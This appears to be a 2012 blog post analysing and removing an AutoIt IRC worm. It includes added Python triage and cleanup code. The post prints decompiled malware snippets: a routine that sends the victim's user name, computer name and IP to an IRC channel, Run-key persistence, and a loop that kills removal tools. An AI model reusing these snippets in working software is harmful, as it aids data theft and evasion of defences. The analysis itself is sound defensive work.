Tuesday, December 4, 2012

Analyzing AutoIt malware

Written by:
ulilclown@gmail.com/@alwaysreit



I ran across this AutoIt-based worm the other day, and I thought it was super fun to analyze. This post will describe how I decompiled and removed it from an infected Windows XP system.

AutoIt is a freeware Windows scripting language, similar to BASIC. Using AutoIt to create malware is not new; in fact this particular family has been around since 2010. Microsoft has a decent writeup on it (Worm:Win32/Autorun.AAO). This worm spreads via autorun.inf.

These are the files I found on the infected system under C:\WINDOWS (MD5 hashes):

1f3d9829908e7e6634818192c75a8b4d *Cysrun.exe
a8e8d5db312691c19552eeef4a4c1931 *Cysusb.exe
5874d14ed6abd50adac4fef08c057fec *Cyswin.exe


These files had the Hidden, System, and Read-Only attributes set (the S, H and R columns in attrib's output):

C:\LOLMICHAEL\files>attrib
A  SHR     C:\LOLMICHAEL\files\Cysrun.exe
A  SHR     C:\LOLMICHAEL\files\Cysusb.exe
A  SHR     C:\LOLMICHAEL\files\Cyswin.exe


Easy to fix (attrib with no file argument applies to every file in the current directory):

C:\LOLMICHAEL\files>attrib -s -h -r

C:\LOLMICHAEL\files>attrib
A          C:\LOLMICHAEL\files\Cysrun.exe
A          C:\LOLMICHAEL\files\Cysusb.exe
A          C:\LOLMICHAEL\files\Cyswin.exe


Running PEiD reveals that these files are packed with UPX (the [Overlay] tag means extra data is appended past the last section):

C:\LOLMICHAEL>PEiD.exe -r -norm files

files\Cysrun.exe    ::    UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]
files\Cysusb.exe    ::    UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]
files\Cyswin.exe    ::    UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo [Overlay]


Quick loop using upx.exe to decompress (-d unpacks, -o names the output file):

C:\LOLMICHAEL\files>for /F %a in ('dir /b') do upx -d -o%a.unpacked %a

C:\LOLMICHAEL\files>dir *.unpacked

02/17/2010  06:42 PM           615,339 Cysrun.exe.unpacked
02/17/2010  06:42 PM           614,671 Cysusb.exe.unpacked
02/17/2010  06:41 PM           632,501 Cyswin.exe.unpacked
               3 File(s)      1,862,511 bytes
               0 Dir(s)   6,404,280,320 bytes free


Now that we have our executables unpacked, a quick look at the strings tells us that each one is a compiled AutoIt script:

C:\LOLMICHAEL\files>strings Cysrun.exe.unpacked | find "AutoIt script"

This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.
AutoIt script files (*.au3, *.a3x)
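As an added example (not code from the original post), here is the PEiD and strings triage above done in Python so it can be run over a whole directory of suspect files: it parses the PE section table to spot UPX's UPX0/UPX1 section names and looks for the compiled-AutoIt banner. The two sample blobs are constructed stand-ins for Cyswin.exe before and after `upx -d`, not the real binaries, and the `AU3!EA06` marker is assumed here to be the AutoIt v3 compiled-script signature.

```python
import os
import struct
import sys

# Markers for a compiled AutoIt v3 script. The first is the string the page's
# `strings | find` command matched; the second is assumed here to be the
# AutoIt v3 compiled-script resource signature.
AUTOIT_MARKERS = (b"This is a compiled AutoIt script", b"AU3!EA06")


def pe_section_names(data):
    """Return the section names of a PE image, or None if data is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header follows the signature: NumberOfSections at +6, SizeOfOptionalHeader at +20
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    first = e_lfanew + 24 + opt_size      # section table starts right after the optional header
    names = []
    for i in range(num_sections):
        off = first + i * 40              # IMAGE_SECTION_HEADER is 40 bytes; Name is the first 8
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def triage(data):
    """Classify one file's bytes: PE or not, section names, UPX section names, AutoIt marker."""
    sections = pe_section_names(data)
    return {
        "is_pe": sections is not None,
        "sections": sections or [],
        # Stock UPX leaves its UPX0/UPX1 (sometimes UPX2) section names in place; a modified
        # packer can rename them, which is also what defeats PEiD's signature.
        "upx_packed": any(s.startswith("UPX") for s in (sections or [])),
        # Only visible after unpacking: the packed copy compresses the banner away.
        "autoit": any(m in data for m in AUTOIT_MARKERS),
    }


def scan_dir(path):
    """Triage every regular file under path; yields (filename, result)."""
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                yield full, triage(fh.read())


def build_pe(section_names, payload=b""):
    """Constructed sample: the smallest layout our parser accepts (not a loadable PE)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                          # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0)  # i386, no optional header
    table = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + coff + table + payload


# Constructed stand-ins for Cyswin.exe before and after `upx -d`.
PACKED = build_pe(["UPX0", "UPX1", ".rsrc"], b"\x13\x37" * 64)
UNPACKED = build_pe([".text", ".rdata", ".data", ".rsrc"],
                    b"This is a compiled AutoIt script. AV researchers please email "
                    b"avsupport@autoitscript.com for support.\0")

if __name__ == "__main__":
    for label, blob in (("packed", PACKED), ("unpacked", UNPACKED)):
        print(label, triage(blob))
    for path, result in (scan_dir(sys.argv[1]) if len(sys.argv) > 1 else ()):
        print(path, result)
```

Run it with a directory argument to triage real files; on a packed sample expect `upx_packed` true and `autoit` false, which is exactly why the post unpacks first and only then runs strings.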


Grabbed an open source AutoIt decompiler called myAut2Exe, and dragged Cyswin.exe into it:


The Au3 files are created for easy viewing with your favorite text editor. Going through the code, I notice a bunch of IRC bot logic; the connection settings are read from an INI file in %TEMP%, with hard-coded defaults if the file or key is missing:

$NICK = IniRead(@TempDir & "\Setting2x.Conf", "IRC", "Nick", "Oxyg3n")
$SERVER = IniRead(@TempDir & "\Setting2x.Conf", "IRC", "Server", "irc.freenode.net")
$CHANNEL = IniRead(@TempDir & "\Setting2x.Conf", "IRC", "Channel", "#Oxyg3n")
$CHANPASS = IniRead(@TempDir & "\Setting2x.Conf", "IRC", "Password", "5035")


And here is a function that sends system info to the channel ("Sistem Raporu" is Turkish for "system report"; the fields are OS version, OS language ID, user name, computer name, and first IP address):

Func SYSINFO()
    TCPSend($SOCKET, "PRIVMSG " & $CHANNEL & " :# Sistem Raporu // [" & @OSVersion & "] [" & @OSLang & "] [" & @UserName & "] [" & @ComputerName & "] [" & @IPAddress1 & "] " & @CRLF)
EndFunc
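As an added example (not from the original post), the following Python mirrors the two pieces of C2 behaviour above from the defender's side: it resolves the [IRC] settings with the same fall-back-to-default semantics as the worm's IniRead() calls, and it parses the SYSINFO() beacon out of IRC traffic so the report fields can be pulled from a capture. The INI body and IRC lines are constructed samples modelled on the decompiled code, not captured traffic.

```python
import configparser
import re

# Defaults from the IniRead() calls in the decompiled script: used when
# %TEMP%\Setting2x.Conf is missing or lacks the key.
C2_DEFAULTS = {"Nick": "Oxyg3n", "Server": "irc.freenode.net",
               "Channel": "#Oxyg3n", "Password": "5035"}


def c2_config(ini_text):
    """Resolve the [IRC] settings the way IniRead(file, "IRC", key, default) does."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    # fallback covers both a missing [IRC] section and a missing key
    return {k: cp.get("IRC", k, fallback=v) for k, v in C2_DEFAULTS.items()}


# Shape of the SYSINFO() beacon:
#   PRIVMSG <chan> :# Sistem Raporu // [os] [lang] [user] [computer] [ip] <CRLF>
BEACON = re.compile(r"PRIVMSG (?P<channel>\S+) :# Sistem Raporu // (?P<fields>(?:\[[^\]]*\] ?)+)")
FIELD_NAMES = ("os_version", "os_lang", "user", "computer", "ip")


def parse_sysinfo(line):
    """Return the beacon's fields as a dict, or None if the line is not a SYSINFO() report."""
    m = BEACON.search(line)
    if not m:
        return None
    values = re.findall(r"\[([^\]]*)\]", m.group("fields"))
    if len(values) != len(FIELD_NAMES):
        return None        # different field count: not the macro layout shown in the script
    return {"channel": m.group("channel"), **dict(zip(FIELD_NAMES, values))}


def find_beacons(lines):
    """Filter IRC lines (one message per line, CRLF stripped) down to SYSINFO() beacons."""
    return [b for b in map(parse_sysinfo, lines) if b is not None]


# Constructed samples; nothing here was captured from a real infection.
SAMPLE_CONF = "[IRC]\nServer=irc.example.net\nChannel=#ops\n"   # Nick and Password fall back
SAMPLE_IRC = [
    "NICK Oxyg3n",
    "JOIN #Oxyg3n 5035",
    "PRIVMSG #Oxyg3n :# Sistem Raporu // [WIN_XP] [0409] [michael] [LOLMICHAEL] [192.168.1.5] ",
    "PRIVMSG #Oxyg3n :hello",
]

if __name__ == "__main__":
    print(c2_config(SAMPLE_CONF))
    for beacon in find_beacons(SAMPLE_IRC):
        print(beacon)
```

Because the bot reads its server and channel from Setting2x.Conf, blocking only the hard-coded irc.freenode.net default is not enough; the config file in %TEMP% (and the URL it is fetched from, listed at the end of the post) tells you where the bot actually connected.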


Run keys are set up for persistence:

RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Cyswin", "REG_SZ", @WindowsDir & "\Cyswin.exe")

RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Cysrun", "REG_SZ", @WindowsDir & "\Cysrun.exe")

This script is able to do a lot more, such as list running processes, download and execute files, and update itself to the newest version. When I tried to remove this malware from an infected system, the first thing I did was run "tasklist.exe"; however, it just seemed to terminate with no output. I was a little confused. Next I attempted to change the file attributes with "attrib.exe", and the same thing happened. So I went back to my Au3 files, opened up the one decompiled from Cysrun.exe, and found the following:

Func GETSYS()
    If ProcessExists("attrib.exe") Then
        ProcessClose("attrib.exe")
    EndIf
    If ProcessExists("taskmgr.exe") Then
        ProcessClose("taskmgr.exe")
    EndIf
    If ProcessExists("msconfig.exe") Then
        ProcessClose("msconfig.exe")
    EndIf
    If ProcessExists("killbox.exe") Then
        ProcessClose("killbox.exe")
    EndIf
    If ProcessExists("procexp.exe") Then
        ProcessClose("procexp.exe")
    EndIf
    If ProcessExists("combofix.exe") Then
        ProcessClose("combofix.exe")
    EndIf
    If ProcessExists("tasklist.exe") Then
        ProcessClose("tasklist.exe")
    EndIf
    If ProcessExists("taskkill.exe") Then
        ProcessClose("taskkill.exe")
    EndIf
    If WinExists("Pocket Killbox") Then
        WinKill("Pocket Killbox")
    EndIf
    If WinExists("Process Explorer") Then
        WinKill("Process Explorer")
    EndIf
EndFunc


Very clever! Since ProcessExists() and ProcessClose() match on the image name alone, I was able to defeat this easily by renaming those tools (obviously).
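As an added example (my own code, not the post's), here is that removal written out for the Run keys and the GETSYS() kill loop above: copies of taskkill.exe and attrib.exe are dropped under random names so the blocklist cannot match them, the worm processes are killed first, then the two Run values are deleted and the files stripped of their attributes and removed. The blocklist and file names are taken from the decompiled script; the cleanup steps only run on Windows, and the use of reg.exe and taskkill.exe is my choice, not something the post describes.

```python
import os
import random
import shutil
import string
import subprocess
import sys

# Image names GETSYS() closes, copied from the decompiled Cysrun.exe.
BLOCKED_PROCESSES = {"attrib.exe", "taskmgr.exe", "msconfig.exe", "killbox.exe",
                     "procexp.exe", "combofix.exe", "tasklist.exe", "taskkill.exe"}
WORM_FILES = ("Cysrun.exe", "Cysusb.exe", "Cyswin.exe")
RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUES = ("Cyswin", "Cysrun")        # the two values the RegWrite() calls create


def is_killed_by_getsys(image_name):
    """ProcessExists()/ProcessClose() match on the image name alone (case-insensitive)."""
    return image_name.lower() in BLOCKED_PROCESSES


def disguised_name():
    """A random .exe name the blocklist cannot match; a renamed tool is still the same tool."""
    while True:
        name = "".join(random.choice(string.ascii_lowercase) for _ in range(8)) + ".exe"
        if not is_killed_by_getsys(name):
            return name


def disguised_copy(tool, workdir):
    """Copy a system32 tool under a throwaway name so GETSYS() leaves it alone."""
    system32 = os.path.join(os.environ.get("SystemRoot", r"C:\WINDOWS"), "system32")
    dst = os.path.join(workdir, disguised_name())
    shutil.copy2(os.path.join(system32, tool), dst)
    return dst


def clean(workdir):
    """Order matters: stop the worm first, then unhook persistence, then delete the files."""
    windir = os.environ.get("SystemRoot", r"C:\WINDOWS")
    taskkill = disguised_copy("taskkill.exe", workdir)
    attrib = disguised_copy("attrib.exe", workdir)
    for image in WORM_FILES:
        subprocess.call([taskkill, "/F", "/IM", image])
    for value in RUN_VALUES:                       # reg.exe is not on the blocklist
        subprocess.call(["reg", "delete", RUN_KEY, "/v", value, "/f"])
    for image in WORM_FILES:
        path = os.path.join(windir, image)
        if os.path.exists(path):
            # Windows refuses to delete a read-only file, so clear S/H/R first
            subprocess.call([attrib, "-s", "-h", "-r", path])
            os.remove(path)


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("the cleanup steps only make sense on the infected Windows host")
    clean(sys.argv[1] if len(sys.argv) > 1 else os.getcwd())
```

Run it as an administrator from a scratch directory. Since the post notes the worm spreads via autorun.inf, any removable media that touched the host should be checked as well, or the Run keys will simply come back.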

Here are some network indicators pulled from these files (URLs defanged):

hxxp://nsgurup.zzl.org/Setting2x.Conf
hxxp://www.autocombo.com/cys/Cysset.exe


Too bad all malware isn't this easy to analyze. Hopefully more virus writers will choose AutoIt in the future!



